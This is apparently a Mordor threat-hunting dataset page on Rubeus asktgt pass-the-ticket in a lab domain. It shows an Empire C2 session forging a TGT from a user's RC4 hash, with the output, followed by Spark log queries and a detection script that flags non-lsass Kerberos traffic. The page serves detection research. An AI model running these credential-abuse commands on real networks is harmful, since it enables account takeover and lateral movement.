Rubeus Userland ASKTGT PTT

Metadata

Author

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/03/19

Modification Date

2020/09/21

Tactics

['TA0006']

Techniques

['T1003.003']

Tags

['Over-Pass-The-Hash', 'Not Touching LSASS']

Dataset Description

This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.

Notebooks

Notebooks created by the community leveraging the mordor datasets

| Author | Name | Link |
|--------|------|------|

Simulation Plan

| Environment  | Tool Type | Module |
|--------------|-----------|--------|
| Mordor shire | C2        | shell  |
| Mordor shire | binary    | asktgt |

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
4EH9PC5S ps 172.18.39.6     WORKSTATION6      *THESHIRE\wardog        powershell         5056   5/0.0    2020-09-22 02:12:12  http            

(Empire: agents) > interact 4EH9PC5S
(Empire: 4EH9PC5S) > 
(Empire: 4EH9PC5S) > shell C:\users\sbeavers\Desktop\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /ptt
[*] Tasked 4EH9PC5S to run TASK_SHELL
[*] Agent 4EH9PC5S tasked with task ID 2
(Empire: 4EH9PC5S) > 
   ______        _                      
  (_____ \      | |                     
  _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0 

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8
[*] Building AS-REQ (w/ preauth) for: 'theshire.local\pgustavo'
[+] TGT request successful!
[*] base64(ticket.kirbi):

[+] Ticket successfully imported!

  ServiceName           :  krbtgt/theshire.local
  ServiceRealm          :  THESHIRE.LOCAL
  UserName              :  pgustavo
  UserRealm             :  THESHIRE.LOCAL
  StartTime             :  9/21/2020 10:39:13 PM
  EndTime               :  9/22/2020 8:39:13 AM
  RenewTill             :  9/28/2020 10:39:13 PM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  ZO21dWzTLeccdZTeq4SgMA==

..Command execution completed.

(Empire: 4EH9PC5S) >

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_shell_rubeus_asktgt_ptt.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION6               |Windows PowerShell                      |800    |165  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |157  |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |141  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |135  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |129  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |67   |
|MORDORDC.theshire.local    |Security                                |5158   |40   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |35   |
|MORDORDC.theshire.local    |Security                                |5156   |33   |
|WORKSTATION5.theshire.local|security                                |5158   |30   |
|WORKSTATION6.theshire.local|security                                |5158   |28   |
|WORKSTATION6.theshire.local|security                                |4658   |28   |
|MORDORDC.theshire.local    |Security                                |4658   |16   |
|WORKSTATION6.theshire.local|security                                |5156   |16   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |16   |
|WORKSTATION6.theshire.local|security                                |4690   |14   |
|WORKSTATION6.theshire.local|security                                |4656   |14   |
|WORKSTATION5.theshire.local|security                                |5156   |10   |
|MORDORDC.theshire.local    |Security                                |4634   |8    |
|MORDORDC.theshire.local    |Security                                |4656   |8    |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
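As an added example (not part of this dataset page or the Mordor project), the check a hunter would run next over the records summarized above: connections to the Kerberos port (88) that Security event 5156 (Windows Filtering Platform permitted connection) attributes to a process other than lsass.exe, which is how an AS-REQ crafted by Rubeus, rather than by the OS Kerberos client, shows up on the workstation. The event records are constructed to mirror the flattened field names Mordor exports (Application, DestPort and ProcessID are the 5156 schema names); the IP addresses and process ids are made up.

```python
from pathlib import PureWindowsPath

# Constructed sample events (not from the real dataset), one dict per record.
# WFP writes the Application field in \device\harddiskvolumeN\... form.
SAMPLE_EVENTS = [
    {"Hostname": "WORKSTATION6.theshire.local", "Channel": "security", "EventID": 5156,
     "Application": "\\device\\harddiskvolume2\\windows\\system32\\lsass.exe",
     "SourceAddress": "172.18.39.6", "DestAddress": "172.18.39.5", "DestPort": "88",
     "ProcessID": "660"},                               # normal: lsass.exe talks to the KDC
    {"Hostname": "WORKSTATION6.theshire.local", "Channel": "security", "EventID": 5156,
     "Application": "\\device\\harddiskvolume2\\users\\sbeavers\\desktop\\rubeus.exe",
     "SourceAddress": "172.18.39.6", "DestAddress": "172.18.39.5", "DestPort": "88",
     "ProcessID": "4812"},                              # suspicious: user-land AS-REQ
    {"Hostname": "WORKSTATION6.theshire.local", "Channel": "security", "EventID": 5156,
     "Application": "\\device\\harddiskvolume2\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
     "SourceAddress": "172.18.39.6", "DestAddress": "172.18.39.5", "DestPort": "445",
     "ProcessID": "5056"},                              # not Kerberos, ignored
    {"Hostname": "WORKSTATION6.theshire.local", "Channel": "Microsoft-Windows-Sysmon/Operational",
     "EventID": 10, "SourceImage": "C:\\Windows\\system32\\svchost.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe"},  # wrong channel/event, ignored
]

KERBEROS_PORT = "88"
LEGITIMATE_KERBEROS_CLIENT = "lsass.exe"


def non_lsass_kerberos_connections(events):
    """Return 5156 events whose destination is the Kerberos port but whose
    originating process is not lsass.exe, the only process that normally
    sends Kerberos requests on a Windows host."""
    hits = []
    for ev in events:
        if ev.get("Channel", "").lower() != "security" or ev.get("EventID") != 5156:
            continue
        if str(ev.get("DestPort")) != KERBEROS_PORT:
            continue
        # Compare on the executable name only; the device-path prefix varies per volume.
        image = PureWindowsPath(ev.get("Application", "")).name.lower()
        if image != LEGITIMATE_KERBEROS_CLIENT:
            hits.append({"Hostname": ev.get("Hostname"), "Application": ev.get("Application"),
                         "ProcessID": ev.get("ProcessID"), "DestAddress": ev.get("DestAddress")})
    return hits


if __name__ == "__main__":
    for hit in non_lsass_kerberos_connections(SAMPLE_EVENTS):
        print(hit)
```

The same logic maps onto the notebook's mordorTable as a filter on Channel, EventID = 5156 and DestPort = 88 with Application not ending in lsass.exe; the ProcessID in a hit can then be joined back to the Sysmon 1 or Security 4688 record that created the process.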